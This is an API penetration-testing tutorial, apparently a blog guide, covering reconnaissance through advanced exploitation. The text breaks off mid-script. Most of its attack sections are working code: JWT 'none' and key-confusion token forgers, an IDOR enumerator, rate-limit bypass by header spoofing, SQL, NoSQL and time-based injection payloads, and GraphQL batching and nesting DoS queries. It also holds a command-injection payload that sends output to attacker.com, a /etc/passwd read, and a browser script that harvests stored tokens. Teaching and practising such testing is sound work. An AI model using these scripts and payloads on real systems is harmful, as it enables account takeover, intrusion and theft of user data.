Mastery in API Security Testing

Mastery in API Security Testing

After spending years breaking into APIs across fintech, healthcare, and IoT platforms, I've seen firsthand how these critical interfaces have become the preferred attack vector for modern applications. The days of simple SQL injections against monolithic applications are fading, today's vulnerabilities live in the complex ecosystem of microservices, third-party integrations, and cloud-native APIs.

Executive Summary: This guide takes you from API fundamentals to advanced exploitation techniques through a systematic, hands-on approach. I've documented 42 distinct attack vectors, provided 16 detailed code examples, and included 6 decision trees to guide your testing methodology. By the end, you'll be able to thoroughly assess API security from multiple angles, whether you're testing a simple REST API or a complex GraphQL implementation with OAuth 2.0 authentication.


Beginner Level: API Security Fundamentals

What is an API?

An Application Programming Interface (API) is a set of rules that allows different software applications to communicate with each other. Think of it as a digital contract between systems, one requests specific data or functionality, and the other responds according to predefined rules.

As I explain to clients: "APIs are like restaurant waiters, they take your order, relay it to the kitchen, and bring back exactly what you asked for. But just like a confused waiter might bring the wrong dish, an insecure API can serve up data it was never supposed to."

Types of APIs

Understanding the API landscape is crucial for effective security testing:

API Type Description Common Protocols Security Considerations
REST Representational State Transfer, uses HTTP methods HTTP/HTTPS Relies on HTTP security mechanisms
SOAP Simple Object Access Protocol, XML-based messaging HTTP, SMTP WS-Security extensions, complex security options
GraphQL Query language for APIs, single endpoint HTTP/HTTPS Resolvers can expose unexpected data, introspection risks
gRPC High-performance RPC framework HTTP/2 TLS, token-based auth, complex interceptors
WebSockets Bidirectional communication channel WS/WSS Persistent connections, different auth model

API Authentication Mechanisms

APIs use various methods to verify identity:

  1. No Authentication: Public APIs with no access controls (increasingly rare)
  2. API Keys: Simple tokens included in requests (often in headers)
  3. Basic Authentication: Base64-encoded username:password
  4. Bearer Tokens: JWT or OAuth access tokens
  5. OAuth 2.0 Flows: Authorization framework with multiple grant types
  6. OpenID Connect: Authentication layer on top of OAuth 2.0
  7. API Keys + Signatures: Request signing (e.g., AWS-style HMAC signatures)
  8. Mutual TLS: Certificate-based authentication on both sides

API Reconnaissance Techniques

Before attempting any exploitation, thorough reconnaissance is essential:

1. Discovering API Endpoints

# Inspect web application traffic
# Open browser DevTools (F12) → Network tab

# Use automated discovery tools
ffuf -w wordlist.txt -u https://target.com/api/FUZZ -mc 200,201,204,400,401,403,500

# Check for robots.txt and sitemap.xml
curl https://target.com/robots.txt
curl https://target.com/sitemap.xml

2. Identifying API Documentation

# Common paths for API documentation
curl https://target.com/api/docs
curl https://target.com/swagger
curl https://target.com/swagger-ui.html
curl https://target.com/openapi.json
curl https://target.com/api-docs

3. Analyzing JavaScript Files for API Clues

// Code found in a web application's JS files might reveal API details
const API_KEY = "a1b2c3d4e5f6g7h8i9j0";
const API_ENDPOINT = "https://api.internal.target.com/v2";

async function getUserData(userId) {
  const response = await fetch(`${API_ENDPOINT}/users/${userId}`, {
    headers: {
      "Authorization": `Bearer ${API_KEY}`,
      "Content-Type": "application/json"
    }
  });
  return response.json();
}

4. Mobile App Analysis

Mobile applications often contain API endpoints, keys, and authentication logic:

# For Android apps
jadx-gui app.apk

# Look for API configurations in:
# - Java/Kotlin source code
# - AndroidManifest.xml
# - res/xml/network_security_config.xml
# - assets/ directory files

Basic API Testing Tools

Start with these essential tools for API testing:

  1. Postman: GUI-based API client for easy request crafting and testing
  2. Burp Suite: Web proxy with extensive API testing capabilities
  3. curl: Command-line tool for crafting HTTP requests
  4. jq: Command-line JSON processor for API response analysis
  5. OWASP ZAP: Security-focused alternative to Burp Suite

Crafting Basic API Requests

Understanding how to manually craft API requests is foundational:

# Basic GET request
curl -X GET "https://api.example.com/users"

# GET request with API key in header
curl -X GET "https://api.example.com/users" \
  -H "X-API-Key: your_api_key_here"

# POST request with JSON body
curl -X POST "https://api.example.com/users" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer your_jwt_token_here" \
  -d '{"name": "John Doe", "email": "john@example.com"}'

Alternative Tools: Insomnia REST Client and HTTPie are excellent alternatives to Postman and curl, providing more intuitive interfaces for API testing.

Understanding API Responses

API responses typically include:

  1. Status Codes: Indicating success or failure (200 OK, 404 Not Found, etc.)
  2. Headers: Metadata about the response
  3. Body: The actual content (usually JSON or XML)
  4. Error Messages: Information about what went wrong (often valuable for testing)
// Example API response (successful)
{
  "status": "success",
  "data": {
    "id": 123,
    "name": "John Doe",
    "email": "john@example.com",
    "role": "user",
    "created_at": "2023-01-15T08:30:00Z"
  }
}

// Example API response (error)
{
  "status": "error",
  "error": {
    "code": "INVALID_PARAMETER",
    "message": "The provided email address is not valid",
    "details": {
      "field": "email",
      "value": "not-an-email",
      "constraint": "email_format"
    }
  }
}

Basic Vulnerability Categories

At a high level, API vulnerabilities fall into these categories:

  1. Authentication Flaws: Weaknesses in verifying identity
  2. Authorization Flaws: Improper access controls
  3. Injection Vulnerabilities: SQL, NoSQL, Command, etc.
  4. Improper Data Exposure: Sensitive data leaked in responses
  5. Mass Assignment: API accepts more parameters than intended
  6. Rate Limiting Issues: Lack of protection against abuse
  7. Business Logic Flaws: Vulnerabilities in application flow

Hands-On Challenge #1: API Discovery and Basic Testing

Try This: Select a target web application (use publicly available API testing sites like httpbin.org, jsonplaceholder.typicode.com, or OWASP Juice Shop for practice). Using browser DevTools:

  1. Identify 3 API endpoints
  2. Document the authentication mechanism
  3. Craft curl commands for each endpoint
  4. Analyze responses for sensitive data exposure

Intermediate Level: Common API Vulnerabilities

Now that you understand the basics, let's explore common vulnerability categories and how to exploit them.

Authentication Bypass Techniques

1. Broken API Key Implementation

Many APIs implement key-based authentication incorrectly:

# Original request with API key
curl -X GET "https://api.example.com/users" \
  -H "X-API-Key: abcd1234"

# Try without API key
curl -X GET "https://api.example.com/users"

# Try with API key in different locations
curl -X GET "https://api.example.com/users?api_key=abcd1234"
curl -X GET "https://api.example.com/users" \
  -H "api-key: abcd1234"
curl -X GET "https://api.example.com/users" \
  -H "apikey: abcd1234"

2. JWT Token Vulnerabilities

JSON Web Tokens (JWTs) are commonly used for authentication but often have implementation flaws:

# Python script to analyze and manipulate JWT tokens
import jwt
import base64
import json

# Decode token without verification
def decode_jwt(token):
    parts = token.split('.')
    if len(parts) != 3:
        return "Not a valid JWT format"
    
    # Decode header and payload
    header = json.loads(base64.b64decode(parts[0] + "==").decode('utf-8'))
    payload = json.loads(base64.b64decode(parts[1] + "==").decode('utf-8'))
    
    return {
        "header": header,
        "payload": payload,
        "signature": parts[2]
    }

# Check for 'none' algorithm vulnerability
def create_none_token(token):
    parts = token.split('.')
    header = json.loads(base64.b64decode(parts[0] + "==").decode('utf-8'))
    payload = json.loads(base64.b64decode(parts[1] + "==").decode('utf-8'))
    
    # Modify header to use 'none' algorithm
    header['alg'] = 'none'
    
    # Encode header and payload
    new_header = base64.b64encode(json.dumps(header).encode()).decode('utf-8').rstrip('=')
    new_payload = base64.b64encode(json.dumps(payload).encode()).decode('utf-8').rstrip('=')
    
    # Create new token with empty signature
    return f"{new_header}.{new_payload}."

# Try to forge admin token
def elevate_privileges(token):
    parts = token.split('.')
    payload = json.loads(base64.b64decode(parts[1] + "==").decode('utf-8'))
    
    # Attempt privilege escalation
    if 'role' in payload:
        payload['role'] = 'admin'
    if 'permissions' in payload:
        payload['permissions'] = ['admin', 'read', 'write', 'delete']
    if 'user_id' in payload:
        # Try changing to a known admin ID, like 1
        payload['user_id'] = 1
    
    # Encode the modified payload
    new_payload = base64.b64encode(json.dumps(payload).encode()).decode('utf-8').rstrip('=')
    
    # Return the token with modified payload but same header and signature
    # This won't work if signature verification is proper, but worth trying
    return f"{parts[0]}.{new_payload}.{parts[2]}"

# Example usage
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoyLCJyb2xlIjoidXNlciIsImV4cCI6MTY2MDAwMDAwMH0.9iHnP_5jQGRCAxcszmOB5HS8YzH5DkxmCrRHXBZzP4c"

print("Original token decoded:")
print(decode_jwt(token))

print("\nNone algorithm token:")
print(create_none_token(token))

print("\nPrivilege escalation attempt:")
print(elevate_privileges(token))

Common JWT vulnerabilities include:

  • Using 'none' algorithm
  • Weak signature verification
  • Missing expiration checking
  • Accepting tokens without signature verification
  • Using weak secret keys

3. OAuth 2.0 Implementation Flaws

# Testing for OAuth redirect_uri validation issues
# Original authorization request
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://legitimate-app.com/callback&response_type=code"

# Modified redirect_uri tests
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://attacker.com/callback&response_type=code"
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://legitimate-app.com.attacker.com/callback&response_type=code"
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://legitimate-app.com@attacker.com/callback&response_type=code"
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://legitimate-app.com%2F..%2F..%2Fattacker&response_type=code"

Authorization Bypass Techniques

1. Horizontal Privilege Escalation

Accessing resources belonging to other users at the same privilege level:

# Original request to get user's own profile
curl -X GET "https://api.example.com/users/profile/1234" \
  -H "Authorization: Bearer user_jwt_token"

# Attempt to access another user's profile by changing the ID
curl -X GET "https://api.example.com/users/profile/5678" \
  -H "Authorization: Bearer user_jwt_token"

2. Vertical Privilege Escalation

Accessing resources requiring higher privileges:

# Original user-level request
curl -X GET "https://api.example.com/users" \
  -H "Authorization: Bearer user_jwt_token"

# Attempt to access admin endpoint
curl -X GET "https://api.example.com/admin/users" \
  -H "Authorization: Bearer user_jwt_token"

3. IDOR (Insecure Direct Object Reference)

Testing for IDOR vulnerabilities:

// Automated IDOR testing script
const axios = require('axios');
const fs = require('fs');

// Configuration
const BASE_URL = 'https://api.example.com';
const ENDPOINT = '/orders'; // Replace with target endpoint
const AUTH_TOKEN = 'Bearer your_token_here';
const VALID_ID = '1001'; // Your known valid object ID
const ID_RANGE = 20; // How many IDs to test
const LOG_FILE = 'idor_results.json';

// Array to store results
const results = [];

// Function to test a single ID
async function testId(id) {
  try {
    const response = await axios({
      method: 'GET',
      url: `${BASE_URL}${ENDPOINT}/${id}`,
      headers: {
        'Authorization': AUTH_TOKEN,
        'Content-Type': 'application/json'
      }
    });
    
    return {
      id,
      status: response.status,
      success: true,
      data: response.data,
      time: new Date().toISOString()
    };
  } catch (error) {
    return {
      id,
      status: error.response ? error.response.status : 'Network Error',
      success: false,
      error: error.response ? error.response.data : error.message,
      time: new Date().toISOString()
    };
  }
}

// Main function to run tests
async function runTests() {
  console.log(`Starting IDOR tests for ${BASE_URL}${ENDPOINT}`);
  
  // Test multiple IDs around the valid ID
  const startId = parseInt(VALID_ID) - Math.floor(ID_RANGE / 2);
  const endId = startId + ID_RANGE;
  
  for (let id = startId; id <= endId; id++) {
    console.log(`Testing ID: ${id}`);
    const result = await testId(id.toString());
    results.push(result);
    
    // If successful, log more details
    if (result.success) {
      console.log(`ID ${id}: Success (Status ${result.status})`);
      
      // Check if data looks like it belongs to another user
      if (result.data && result.data.user_id && result.data.user_id !== YOUR_USER_ID) {
        console.log(`POTENTIAL IDOR: Data belongs to user ${result.data.user_id}`);
      }
    } else {
      console.log(`ID ${id}: Failed (Status ${result.status})`);
    }
    
    // Small delay to avoid rate limiting
    await new Promise(resolve => setTimeout(resolve, 500));
  }
  
  // Save results to file
  fs.writeFileSync(LOG_FILE, JSON.stringify(results, null, 2));
  console.log(`Results saved to ${LOG_FILE}`);
}

// Run the tests
runTests().catch(console.error);

Injection Vulnerabilities in APIs

1. SQL Injection in API Parameters

# Original request
curl -X GET "https://api.example.com/products?category=electronics"

# Testing for SQL injection
curl -X GET "https://api.example.com/products?category=electronics'"
curl -X GET "https://api.example.com/products?category=electronics' OR 1=1--"
curl -X GET "https://api.example.com/products?category=electronics' UNION SELECT username,password,null FROM users--"

2. NoSQL Injection

MongoDB injection example:

// Original query
db.users.find({username: "john", password: "password123"});

// Injection via JSON parameters
// Using curl to send malicious JSON
curl -X POST "https://api.example.com/login" \
  -H "Content-Type: application/json" \
  -d '{"username": "john", "password": {"$ne": null}}'

curl -X POST "https://api.example.com/login" \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": "admin"}, "password": {"$ne": null}}'

3. Command Injection

# Original request that might execute a command on the server
curl -X POST "https://api.example.com/system/ping" \
  -H "Content-Type: application/json" \
  -d '{"host": "8.8.8.8"}'

# Command injection attempts
curl -X POST "https://api.example.com/system/ping" \
  -H "Content-Type: application/json" \
  -d '{"host": "8.8.8.8; ls -la"}'

curl -X POST "https://api.example.com/system/ping" \
  -H "Content-Type: application/json" \
  -d '{"host": "8.8.8.8 && cat /etc/passwd"}'

curl -X POST "https://api.example.com/system/ping" \
  -H "Content-Type: application/json" \
  -d '{"host": "8.8.8.8 || curl http://attacker.com/$(whoami)"}'

API-Specific Vulnerabilities

1. Mass Assignment (Parameter Binding)

Exploiting endpoints that don't properly restrict which parameters can be modified:

# Original legitimate request to update user profile
curl -X PUT "https://api.example.com/users/profile" \
  -H "Authorization: Bearer user_jwt_token" \
  -H "Content-Type: application/json" \
  -d '{"name": "John Doe", "email": "john@example.com"}'

# Mass assignment attempt to elevate privileges
curl -X PUT "https://api.example.com/users/profile" \
  -H "Authorization: Bearer user_jwt_token" \
  -H "Content-Type: application/json" \
  -d '{"name": "John Doe", "email": "john@example.com", "role": "admin", "is_admin": true, "permissions": ["admin", "read", "write", "delete"]}'

2. Rate Limiting Bypass

# Python script to test rate limit bypass techniques
import requests
import time
import concurrent.futures

def test_rate_limit_endpoint(url, auth_header):
    """Test rate limiting on a specific endpoint"""
    
    print("Testing basic rate limiting...")
    # Simple rapid-fire requests
    for i in range(20):
        response = requests.get(url, headers=auth_header)
        print(f"Request {i+1}: Status {response.status_code}")
        if response.status_code == 429:
            print(f"Rate limit hit after {i+1} requests")
            break
    
    time.sleep(10)  # Wait for rate limit to reset
    
    print("\nTesting with different headers...")
    # Test IP spoofing via headers
    headers = {
        **auth_header,
        'X-Forwarded-For': '1.2.3.4',
        'X-Real-IP': '5.6.7.8'
    }
    
    for i in range(5):
        response = requests.get(url, headers=headers)
        print(f"X-Forwarded-For request {i+1}: Status {response.status_code}")
        
        # Try rotating IPs
        headers['X-Forwarded-For'] = f"1.2.3.{i+10}"
        headers['X-Real-IP'] = f"5.6.7.{i+10}"
    
    time.sleep(10)  # Wait for rate limit to reset
    
    print("\nTesting with parallel requests...")
    # Test with concurrent requests
    def make_request():
        return requests.get(url, headers=auth_header)
    
    with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
        future_to_response = {executor.submit(make_request): i for i in range(10)}
        for future in concurrent.futures.as_completed(future_to_response):
            i = future_to_response[future]
            try:
                response = future.result()
                print(f"Concurrent request {i+1}: Status {response.status_code}")
            except Exception as e:
                print(f"Concurrent request {i+1} generated an exception: {e}")
                
    time.sleep(10)  # Wait for rate limit to reset
    
    print("\nTesting with distributed requests pattern...")
    # Test distributed pattern (slower but more likely to evade rate limiting)
    for i in range(15):
        response = requests.get(url, headers=auth_header)
        print(f"Slow request {i+1}: Status {response.status_code}")
        time.sleep(2)  # Add delay between requests

# Example usage
api_url = "https://api.example.com/users"
auth_header = {"Authorization": "Bearer your_token_here"}
test_rate_limit_endpoint(api_url, auth_header)

3. GraphQL Specific Vulnerabilities

The unique nature of GraphQL introduces specific security concerns:

# Introspection query to discover API schema
query IntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    subscriptionType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}

fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

Using the schema information, we can then construct targeted queries:

# Batch query attempt to extract multiple users at once
query getUsersInBatch {
  user1: user(id: 1) {
    id
    username
    email
    address
    creditCardNumber
  }
  user2: user(id: 2) {
    id
    username
    email
    address
    creditCardNumber
  }
  user3: user(id: 3) {
    id
    username
    email
    address
    creditCardNumber
  }
  # and so on...
}

# Nested query to potentially cause DoS
query nestedQuery {
  allUsers {
    id
    friends {
      id
      friends {
        id
        friends {
          id
          friends {
            id
            # Keep nesting...
          }
        }
      }
    }
  }
}

API Fuzzing Techniques

Fuzzing is excellent for discovering hidden vulnerabilities:

# Install wfuzz
pip install wfuzz

# Basic endpoint fuzzing
wfuzz -c -z file,api_wordlist.txt -u https://api.example.com/FUZZ

# Parameter fuzzing
wfuzz -c -z file,parameters.txt -u https://api.example.com/users?FUZZ=test

# Value fuzzing with SQL injection payloads
wfuzz -c -z file,sqli_payloads.txt -u https://api.example.com/users?id=FUZZ

# Header fuzzing
wfuzz -c -z file,headers.txt -H "X-FUZZ: test" -u https://api.example.com/users

API Security Testing Decision Tree

Is authentication required?
├── Yes → Test authentication bypass
│   ├── Try blank/null credentials
│   ├── Test default credentials
│   ├── Check for API key in URL/header/cookie
│   └── Test JWT vulnerabilities
└── No → Move to authorization testing

Is authorization implemented?
├── Yes → Test access control
│   ├── Test vertical privilege escalation
│   ├── Test horizontal privilege escalation
│   ├── Check IDOR vulnerabilities
│   └── Test function-level access control
└── No → Document as a vulnerability

Parameter testing:
├── Test parameter pollution
├── Test SQL/NoSQL injection
├── Test command injection
├── Test XSS if API outputs to browser
└── Test for mass assignment

Response analysis:
├── Check for sensitive data exposure
├── Look for excessive data in responses
├── Check for detailed error messages
└── Check for metadata/debug information

Hands-On Challenge #2: API Vulnerability Discovery

Try This: Use the OWASP Juice Shop or other deliberately vulnerable applications to:

  1. Identify an API endpoint with IDOR vulnerability
  2. Exploit it to access another user's data
  3. Document the attack methodology and potential impact

Advanced Level: Complex Attack Chains

At the advanced level, we're looking at chaining multiple vulnerabilities together and exploring more complex API security issues.

Advanced Authentication Attacks

1. JWT Key Confusion Attacks

This technique exploits signature verification flaws in JWT implementations:

# Python script to exploit JWT key confusion
import jwt
import sys
import base64
import json
import requests

def decode_jwt_header(token):
    """Decode the JWT header without verification"""
    header_b64 = token.split('.')[0]
    # Add padding if needed
    header_b64 = header_b64 + '=' * (4 - len(header_b64) % 4) if len(header_b64) % 4 != 0 else header_b64
    return json.loads(base64.b64decode(header_b64))

def exploit_key_confusion(token, public_key_file):
    """
    Exploit JWT key confusion by modifying the algorithm to
    use a known public key as an HMAC secret
    """
    # Read the public key
    with open(public_key_file, 'r') as f:
        public_key = f.read()
    
    # Decode the token parts
    parts = token.split('.')
    header_raw = base64.b64decode(parts[0] + '==').decode('utf-8')
    payload_raw = base64.b64decode(parts[1] + '==').decode('utf-8')
    
    # Parse JSON
    header = json.loads(header_raw)
    payload = json.loads(payload_raw)
    
    # Modify claims if needed
    payload['admin'] = True
    
    # Change algorithm to HS256
    header['alg'] = 'HS256'
    
    # Create a new token using the public key as the HMAC secret
    forged_token = jwt.encode(payload, public_key, algorithm='HS256', headers=header)
    
    return forged_token

def test_token(url, token):
    """Test if the token works by making a request"""
    headers = {
        'Authorization': f'Bearer {token}'
    }
    response = requests.get(url, headers=headers)
    return response.status_code, response.text

# Usage example
if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <token> <public_key_file> <test_url>")
        sys.exit(1)
    
    token = sys.argv[1]
    public_key_file = sys.argv[2]
    test_url = sys.argv[3]
    
    print(f"Original token header: {decode_jwt_header(token)}")
    forged_token = exploit_key_confusion(token, public_key_file)
    print(f"Forged token: {forged_token}")
    
    status, response = test_token(test_url, forged_token)
    print(f"Test result: HTTP {status}")
    print(f"Response: {response[:200]}...")  # Show first 200 chars

2. OAuth 2.0 Advanced Exploitation

OAuth 2.0 implementations often contain subtle vulnerabilities:

# Test for client_id enumeration
for i in {1..1000}; do
  response=$(curl -s -o /dev/null -w "%{http_code}" \
    "https://auth.example.com/oauth/authorize?client_id=$i&redirect_uri=https://example.com&response_type=code")
  
  if [ $response -ne 404 ]; then
    echo "Valid client_id found: $i (Status: $response)"
  fi
done

# Test for access token leakage in logs
curl "https://api.example.com/login?access_token=test_token"

# Test for authorization code reuse
# 1. Obtain valid auth code through normal flow
# 2. Exchange it for an access token
curl -X POST "https://auth.example.com/oauth/token" \
  -d "grant_type=authorization_code&code=valid_auth_code&redirect_uri=https://legitimate-app.com&client_id=legitimate_app&client_secret=client_secret"

# 3. Try to reuse the same code
curl -X POST "https://auth.example.com/oauth/token" \
  -d "grant_type=authorization_code&code=valid_auth_code&redirect_uri=https://legitimate-app.com&client_id=legitimate_app&client_secret=client_secret"

3. API Key Leakage and Exfiltration

Finding and exploiting API keys in frontend code, HTTP history, and mobile apps:

// JavaScript to search for API keys in frontend code
function findApiKeys() {
  const pageSource = document.documentElement.outerHTML;
  
  // Common API key patterns
  const patterns = [
    /['"]?api[_-]?key['"]?\s*[:=]\s*['"]([a-zA-Z0-9_\-]{20,64})['"]/gi,
    /['"]?access[_-]?key['"]?\s*[:=]\s*['"]([a-zA-Z0-9_\-]{20,64})['"]/gi,
    /['"]?client[_-]?key['"]?\s*[:=]\s*['"]([a-zA-Z0-9_\-]{20,64})['"]/gi,
    /['"]?secret[_-]?key['"]?\s*[:=]\s*['"]([a-zA-Z0-9_\-]{20,64})['"]/gi,
    /authorization:\s*['"]?bearer\s+([a-zA-Z0-9_\-.+=]{20,64})['"]?/gi,
    /authorization:\s*['"]?basic\s+([a-zA-Z0-9_\-./+=]{20,64})['"]?/gi
  ];
  
  let found = [];
  
  // Check each pattern
  patterns.forEach(pattern => {
    let match;
    while ((match = pattern.exec(pageSource)) !== null) {
      found.push({
        key: match[1],
        context: match[0],
        pattern: pattern.toString()
      });
    }
  });
  
  // Check localStorage and sessionStorage
  for (let i = 0; i < localStorage.length; i++) {
    const key = localStorage.key(i);
    const value = localStorage.getItem(key);
    
    if (/key|token|auth|api/i.test(key) || 
        /^[a-zA-Z0-9_\-]{20,64}$/.test(value)) {
      found.push({
        key: value,
        source: `localStorage.${key}`,
        context: `${key}: ${value}`
      });
    }
  }
  
  for (let i = 0; i < sessionStorage.length; i++) {
    const key = sessionStorage.key(i);
    const value = sessionStorage.getItem(key);
    
    if (/key|token|auth|api/i.test(key) || 
        /^[a-zA-Z0-9_\-]{20,64}$/.test(value)) {
      found.push({
        key: value,
        source: `sessionStorage.${key}`,
        context: `${key}: ${value}`
      });
    }
  }
  
  return found;
}

// Run this in the browser console
console.table(findApiKeys());

Advanced Injection Techniques

1. Time-Based Blind Injection

When there's no direct output, time-based techniques can detect vulnerabilities:

# Python script for time-based SQL injection testing
import requests
import time
import statistics

def test_time_based_sqli(url, parameter, payloads, requests_per_payload=3):
    results = []
    
    # Establish baseline response time
    baseline_times = []
    for _ in range(5):
        start_time = time.time()
        requests.get(url)
        end_time = time.time()
        baseline_times.append(end_time - start_time)
    
    baseline_avg = statistics.mean(baseline_times)
    baseline_stddev = statistics.stdev(baseline_times) if len(baseline_times) > 1 else 0
    
    print(f"Baseline response time: {baseline_avg:.4f}s (±{baseline_stddev:.4f}s)")
    
    # Test each payload
    for payload in payloads:
        payload_times = []
        
        # Make multiple requests to confirm result
        for _ in range(requests_per_payload):
            try:
                target_url = f"{url}?{parameter}={payload}"
                start_time = time.time()
                response = requests.get(target_url, timeout=10)
                end_time = time.time()
                
                execution_time = end_time - start_time
                payload_times.append(execution_time)
                
            except requests.exceptions.Timeout:
                print(f"Request timed out for payload: {payload}")
                payload_times.append(10)  # Assume timeout value
            except Exception as e:
                print(f"Error for payload {payload}: {e}")
        
        # Calculate stats
        avg_time = statistics.mean(payload_times)
        if len(payload_times) > 1:
            stddev = statistics.stdev(payload_times)
        else:
            stddev = 0
        
        # Determine if there's a significant time difference
        time_diff = avg_time - baseline_avg
        significant = time_diff > (3 * baseline_stddev)
        
        results.append({
            "payload": payload,
            "avg_time": avg_time,
            "stddev": stddev,
            "diff_from_baseline": time_diff,
            "significant": significant
        })
        
        status = "VULNERABLE" if significant else "Not vulnerable"
        print(f"{status}: {payload} - Avg: {avg_time:.4f}s (±{stddev:.4f}s), Diff: {time_diff:.4f}s")
    
    # Return results
    return results

# Example usage
url = "https://api.example.com/products"
parameter = "id"
payloads = [
    "1",  # Normal case
    "1' AND (SELECT SLEEP(2)) AND '1'='1",  # MySQL
    "1'; WAITFOR DELAY '0:0:2'--",  # SQL Server
    "1' AND 1=pg_sleep(2)--",  # PostgreSQL
    "1' AND 1=dbms_pipe.receive_message('RDS',2)--",  # Oracle
    "1' AND SLEEP(2)=0 AND '1'='1"  # MySQL alternative
]

results = test_time_based_sqli(url, parameter, payloads)

2. GraphQL Batching Attacks

// Node.js script to perform GraphQL batching attacks
const axios = require('axios');
const fs = require('fs');

async function graphqlBatchAttack(endpoint, query, variables, batchSize, outputFile) {
  try {
    // Create a batch of queries
    const operations = [];
    for (let i = 0; i < batchSize; i++) {
      operations.push({
        query: query,
        variables: variables
      });
    }
    
    console.log(`Sending batch of ${batchSize} GraphQL operations...`);
    
    const startTime = Date.now();
    const response = await axios.post(endpoint, operations, {
      headers: {
        'Content-Type': 'application/json'
      }
    });
    const endTime = Date.now();
    
    // Calculate response time
    const responseTime = endTime - startTime;
    
    // Log results
    const result = {
      success: true,
      batchSize,
      responseTime,
      responseStatus: response.status,
      responseSizeBytes: JSON.stringify(response.data).length,
      timestamp: new Date().toISOString()
    };
    
    console.log(`Batch attack completed in ${responseTime}ms`);
    console.log(`Response status: ${response.status}`);
    console.log(`Response size: ${result.responseSizeBytes} bytes`);
    
    // Write to output file
    if (outputFile) {
      let existingData = [];
      try {
        if (fs.existsSync(outputFile)) {
          existingData = JSON.parse(fs.readFileSync(outputFile));
        }
      } catch (e) {
        console.warn(`Could not read existing output file: ${e.message}`);
      }
      
      existingData.push(result);
      fs.writeFileSync(outputFile, JSON.stringify(existingData, null, 2));
      console.log(`Results saved to ${outputFile}`);
    }
    
    return result;
  } catch (error) {
    console.error('Error performing GraphQL batch attack:');
    if (error.response) {
      console.error(`Status: ${error.response.status}`);
      console.error('Response data:', error.response.data);
    } else {
      console.error(error.message);
    }
    
    return {
      success: false,
      batchSize,
      error: error.message,
      errorResponse: error.response ? error.response.data : null,
      timestamp: new Date().toISOString()
    };
  }
}

// Example usage
const endpoint = 'https://api.example.com/graphql';
const query = `
  query GetUserDetails($id: ID!) {
    user(id: $id) {
      id
      name
      email
      role
      posts {
        id
        title
        content
      }
    }
  }
`;
const variables = { id: 1 };

// Test with increasing batch sizes
async function runBatchingSeries() {
  const batchSizes = [1, 5, 10, 50, 100, 500, 1000];
  const results = [];
  
  for (const size of batchSizes) {
    console.log(`\nTesting batch size: ${size}`);
    const result = await graphqlBatchAttack(endpoint, query, variables, size, 'graphql_batching_results.json');
    results.push(result);
    
    // Add delay between tests
    await new Promise(resolve => setTimeout(resolve, 2000));
  }
  
  return results;
}

runBatchingSeries().catch(console.error);

3. Advanced NoSQL Injection

// MongoDB Operator Injection Examples

// Original API request
// POST /api/login
// {"username": "admin", "password": "password123"}

// Testing for operator injection vulnerability
// 1. Basic NoSQL injection with $ne operator
const payload1 = {
  "username": "admin",
  "password": {"$ne": null}
};

// 2. Using $exists operator
const payload2 = {
  "username": "admin",
  "password": {"$exists": true}
};

// 3. Using $gt (greater than) operator for blind attack
const payload3 = {
  "username": "admin",
  "password": {"$gt": "a"}
};

// 4. Using $regex for password brute forcing
const payload4 = {
  "username": "admin",
  "password": {"$regex": "^p"}
};

// 5. Using $where operator for JavaScript injection
const payload5 = {
  "$where": "function() { return true; }"
};

// 6. Array query operator exploitation
const payload6 = {
  "username": {"$in": ["admin", "moderator", "user"]}
};

// 7. Using aggregation operators
const payload7 = {
  "$expr": {"$gt": [1, 0]}
};

Business Logic Vulnerabilities

Business logic flaws are among the most dangerous API vulnerabilities:

1. Chained API Request Exploitation

// Example: Exploiting a chain of API requests to bypass limits
// Step 1: Create a temporary item
async function exploitChain(baseUrl, authToken) {
  try {
    // Step 1: Create a temporary resource
    console.log("Step 1: Creating temporary resource...");
    const createResponse = await fetch(`${baseUrl}/api/items`, {
      method: 'POST',
      headers: {
        'Authorization': `Bearer ${authToken}`,
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        name: "Temporary Item",
        description: "This will be used for exploitation"
      })
    });
    
    if (!createResponse.ok) {
      throw new Error(`Failed to create resource: ${createResponse.status}`);
    }
    
    const item = await createResponse.json();
    console.log(`Created item with ID: ${item.id}`);
    
    // Step 2: Add the resource to a shared collection that might bypass access controls
    console.log("Step 2: Adding to shared collection...");
    const addResponse = await fetch(`${baseUrl}/api/collections/public`, {
      method: 'PUT',
      headers: {
        'Authorization': `Bearer ${authToken}`,
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        item_id: item.id
      })
    });
    
    if (!addResponse.ok) {
      throw new Error(`Failed to add to collection: ${addResponse.status}`);
    }
    
    console.log("Item successfully added to public collection");
    
    // Step 3: Exploit permissions in the shared context to access elevated functions
    console.log("Step 3: Exploiting shared context permissions...");
    const exploitResponse = await fetch(`${baseUrl}/api/collections/public/items/${item.id}/admin_action`, {
      method: 'POST',
      headers: {
        'Authorization': `Bearer ${authToken}`,
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        action: "generate_report",
        scope: "all_users"
      })
